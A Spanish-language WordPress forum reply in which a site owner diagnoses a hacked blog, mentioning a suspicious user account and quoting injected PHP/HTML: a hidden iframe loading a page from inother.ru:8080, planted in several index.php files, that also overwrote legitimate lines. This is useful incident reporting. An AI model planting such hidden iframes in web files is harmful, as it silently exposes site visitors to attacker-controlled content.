Respuesta a: Desaparecio mi Blog, pag en blanco

Inicio Foros WordPress General WordPress.org Desaparecio mi Blog, pag en blanco Respuesta a: Desaparecio mi Blog, pag en blanco

ralcesar
Participante

Gracias

Ya borre todos los demas usuarios de la BD, estan registrados desde hace mucho tiempo pero nunca aportaron nada :P.

Un usuario me llamo la atención (amante) osckr2009@hot…com que se registro el 31 de Agosto, pero nunca me llego el mail avisándome de tal registro.

Estoy revisando el backup local, hasta ahora lo unico que encontre fue en el index del wp-content unas lineas en php [b]golden is good[/b] no tienen q estar ahí pero tampoco creo que sean las culpables

EDIT: son las culpables, en la version del server del archivo tiene más lineas y no me quedan dudas que es eso.

[code]<?php
// Silence is golden.

<div style=”display:none”></div>
<div style=”display:none”><iframe src=”http://inother.ru:8080/index.php” width=670 height=403 ></iframe></div>[/code]

Ese código además del index.php de la carpeta wp-content también lo tenia el index.php de la instalación de WP y el index.php de todos los themes: activo, classic y default

Encima el muy hdp! al agregarse las lineas maliciosas borra lineas correctas por lo que el tamaño del archivo no se modifica , lo note viendo que faltaba el llamado al footer, empecé a revisar los que habia corregido y todos estaban incompletos

Centro de preferencias de privacidad

Cookies imprescindibles

Se usan para almacenar tu nombre, correo, IP y demás datos que dejas en los formularios de comentarios, contacto, acceso y tus preferencias de privacidad.

AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY, comment_author, comment_author_email, comment_author_url, rated, gdpr, gawdp

Cookies de terceros

Usamos cookies de terceros en las que se almacenan externamente para conocer tus usos de navegación, si ya estás suscrito al boletín y los elementos compartidos en redes sociales

cfduit_, intercom-id, intercom-lou, mailerlite:language, mailerlite:webform, _ga, _gid
cfduit_, intercom-id, intercom-lou, mailerlite:language, mailerlite:webform
_ga, _gid

¿Quieres cerrar tu cuenta?

Se cerrará tu cuenta y todos los datos se borrarán de manera permanente y no se podrán recuperar ¿Estás seguro?

Pin It on Pinterest